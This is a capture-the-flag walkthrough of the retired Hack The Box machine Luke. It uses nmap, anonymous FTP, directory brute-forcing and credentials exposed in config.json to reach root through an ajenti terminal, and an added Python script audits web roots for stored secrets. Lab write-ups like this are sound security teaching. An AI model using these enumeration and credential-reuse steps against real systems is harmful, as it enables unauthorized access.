Today we are going to solve LUKE, a retired Hack The Box (HTB) machine.
First, we scan for open ports to begin enumerating the target, using the popular port-scanning tool nmap.
nmap -A 10.10.10.137
The scan shows that 5 ports are open on the VM: 21, 22, 80, 3000 and 8000.
We can also observe that anonymous FTP login is allowed.
ftp 10.10.10.137
ftp> ls
We have logged in successfully!
ls
Here we find the webapp directory.
ftp> cd webapp
ftp> ls
ftp> get for_Chihiro.txt
cat for_Chihiro.txt
Next, we entered the IP address, 10.10.10.137, and got the LUKE page.
Let’s check the site out with Dirbuster.
./dirsearch.py -u http://10.10.10.137 -e php -x 400,403,404
We get:
/config.php
/management/
Browsing to 10.10.10.137/management, we find that we are not authorized.
We found that a Node.js service is running on port 3000. Browsing to the IP address on port 3000, we got the message "Auth token is not supplied".
./dirsearch.py -u http://10.10.10.137:3000 -e php -x 400,403,404
We brute-forced again, this time on port 3000, and found 2 pages:
/login
/users
We logged in to the management page successfully using the credentials of the user Derry.
User Name: Derry
Password: rZ86wwLvx7jUxtch
After we log in, we find the files config.json, config.php and login.php. Of these, config.json seems to be different.
The config.json file has some information related to the 'ajenti' service running on port 8000, and we can observe a password in it: KpMasng655EtTy9Z
Username: root
Password: KpMasng655EtTy9Z
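The config.json finding above is a plaintext credential stored in a web-served directory. As an added example (not part of the original write-up), this Python script audits a web root for JSON files that hold credential-like values; the key-name pattern, the function names and the sample tree are assumptions, and all sample values are constructed.

```python
import json
import re
import tempfile
from pathlib import Path

# Key names that usually hold secrets (assumed list; extend for your stack).
SECRET_KEY = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key", re.I)


def walk(node, path="", key=""):
    """Yield (json_path, nearest_key, value) for every scalar leaf."""
    if isinstance(node, dict):
        for k, v in node.items():
            yield from walk(v, f"{path}.{k}" if path else str(k), str(k))
    elif isinstance(node, list):
        for i, v in enumerate(node):
            yield from walk(v, f"{path}[{i}]", key)
    else:
        yield path, key, node


def audit_webroot(webroot):
    """Return sorted (file, json_path) pairs for non-empty secret-like strings."""
    findings = []
    for file in Path(webroot).rglob("*.json"):
        try:
            data = json.loads(file.read_text(encoding="utf-8", errors="replace"))
        except (OSError, ValueError):
            continue  # unreadable or not valid JSON: nothing to inspect
        for json_path, key, value in walk(data):
            if SECRET_KEY.search(key) and isinstance(value, str) and value:
                findings.append((file.relative_to(webroot).as_posix(), json_path))
    return sorted(findings)


def demo():
    """Audit a constructed web root; every file and value here is made up."""
    with tempfile.TemporaryDirectory() as root:
        mgmt = Path(root, "management")
        mgmt.mkdir()
        (mgmt / "config.json").write_text(json.dumps(
            {"users": {"root": {"password": "EXAMPLE-ONLY"}}, "bind": {"port": 8000}}))
        (mgmt / "theme.json").write_text(json.dumps({"color": "blue"}))
        (mgmt / "broken.json").write_text("{not json")
        return audit_webroot(root)

if __name__ == "__main__":
    for name, where in demo():
        print(f"[!] {name}: credential-like value at {where}")
```

Any hit under a directory the web server exposes should be moved out of the web root and the credential rotated.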
This is the dashboard of the ajenti service. We will open a terminal in it.
id
ls
cd home/
ls
cd derry
ls
cat user.txt
cd
ls
cd root
ls
cat root.txt
Luke HTB was an excellent machine with regard to enumeration and connecting the dots.